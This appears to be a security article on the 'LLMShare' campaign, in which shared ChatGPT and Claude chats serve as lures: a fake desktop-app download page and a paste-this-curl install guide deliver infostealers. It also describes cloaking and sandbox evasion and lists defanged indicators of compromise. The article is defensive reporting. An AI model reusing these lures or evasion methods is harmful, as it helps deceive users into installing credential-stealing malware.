In the rapidly evolving landscape of 2026, threat actors have found a sophisticated new method to bypass traditional security perimeters: abusing the very AI tools that organizations have come to trust. A recently uncovered campaign, dubbed LLMShare by researchers at Push Security, demonstrates a high-fidelity execution of “legitimate platform abuse.” By weaponizing the content-sharing features of ChatGPT and Claude, attackers are delivering malware through trusted domains that bypass URL reputation filters, secure web gateways, and even the natural skepticism of seasoned users.
Architectural Vulnerability: Exploiting Domain Reputation
The core of the LLMShare campaign lies in its exploitation of structural trust. Traditional cybersecurity defenses rely heavily on domain reputation and categorization. When a user clicks a link, security tools check if the domain is known for hosting malicious content. Because chatgpt.com and claude.ai are legitimate, high-authority domains, any link originating from them—including shared chat sessions—is flagged as “safe” by default.
Attackers are capitalizing on this “reputation shield” to host their initial staging ground. By using the /s/ (shared) URL path on OpenAI’s domain, the threat actors ensure that their malicious lures are served from a 100% legitimate infrastructure. This method effectively blinds standard automated scanners and safe-browsing databases, which are programmed not to block core AI productivity platforms.
The ChatGPT Variant: Precision Rendering and Social Engineering
The ChatGPT branch of this campaign marks a significant technical leap from previous “ClickFix” or “InstallFix” attacks. Rather than merely presenting a conversation history containing a malicious command, the attackers utilize ChatGPT’s code-rendering capabilities to build a fully designed, self-contained web page within the chat interface.
Using custom HTML and CSS injected into a chat session, the attackers simulate a “service disruption” notice. The page informs the user that the web version of ChatGPT is currently experiencing high traffic and suggests downloading the “official” desktop application to continue. This call to action is highly effective because it provides a plausible solution to a common user frustration. When the user clicks the download button, they are redirected to a secondary site—often a convincing clone of the OpenAI download portal—which delivers macOS or Windows payloads. These payloads frequently contain sophisticated infostealers designed to harvest credentials and session tokens directly from the user’s browser.
The Claude Variant: Targeted Malware via Terminal Commands
Simultaneously, Push Security detected a parallel variant targeting the Claude.ai ecosystem. In this scenario, the social engineering is tailored toward developers and power users. A shared Claude conversation is disguised as an “Apple Support” guide for installing “Claude Code” on Mac.
The chat provides a seemingly helpful curl command that the user is instructed to copy and paste into their terminal. For users who have grown accustomed to AI assisting with technical workflows, this feels like a natural extension of the tool’s utility. However, the command is a “one-liner” designed to download and execute a malicious script in the background. The fact that both ChatGPT and Claude variants are surfacing in the same timeframe suggests a unified “playbook” among threat actors, who are testing different platforms to see which social engineering hooks yield the highest conversion rates.
Evasion Techniques: Cloaking and Sandbox Detection
Beyond the initial delivery, the LLMShare campaign employs advanced evasion techniques to avoid detection by security researchers. The secondary download sites often utilize “cloaking”—a technique where the server inspects the visitor’s IP and user-agent. If the visitor is identified as an automated scanner or a security researcher (e.g., from a known data center IP), the site serves a benign, unrelated page, such as a generic corporate site. Only real users coming from residential or business ISPs are shown the malware download page.
Furthermore, analysis of the Windows payloads has revealed built-in logic to detect virtualized environments. If the malware determines it is running inside a sandbox or a VM—standard tools for security analysts—it ceases all malicious activity to remain “clean” in reporting. This multi-layered approach to stealth makes the LLMShare campaign a persistent threat that can remain active for extended periods before being flagged.
Technical Indicators of Compromise (IoCs)
While the domains and files rotate quickly, the following indicators were observed during the initial discovery. Security teams should monitor for traffic to these specific shared links and the associated secondary domains.
| Indicator | Type | Note |
hxxps://claude[.]ai/share/8e6401b5-4849-46c4-a3cb-29e1c3c49131 | URL | Maliciously crafted shared Claude chat |
hxxps://chatgpt[.]com/s/cb_6a0f1e6bbec88191aa7fede27163f08d | URL | Rendered “Service Disruption” page |
openew[.]app | Domain | Primary redirect for the fake installer |
de8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78 | SHA256 | Hash of the malicious “ChatGPT for Desktop” installer |
Our Opinion: The Death of “URL Reputation” as a Security Metric
The LLMShare campaign is a masterclass in Legitimate Platform Abuse. By living on chatgpt.com, these attackers have effectively turned a “Trusted Domain” into a Trojan Horse.
In our view, this signals a critical failure in traditional, static security models. If your security posture relies on “allow-listing” major SaaS platforms (like OpenAI, Microsoft 365, or Google Cloud), you are essentially blind to this entire class of attack. We are moving toward a reality where the reputation of the platform no longer guarantees the safety of the content hosted on it.
Organizations must shift from “Domain-Based” security to “Behavioral-Based” security. It is no longer enough to know where a user is going; you must inspect what the page is doing and what it is asking the user to run. As AI-native threats become the norm, the browser must become the new perimeter, equipped with real-time telemetry that can identify and block malicious intent—even when it arrives on a “trusted” domain.
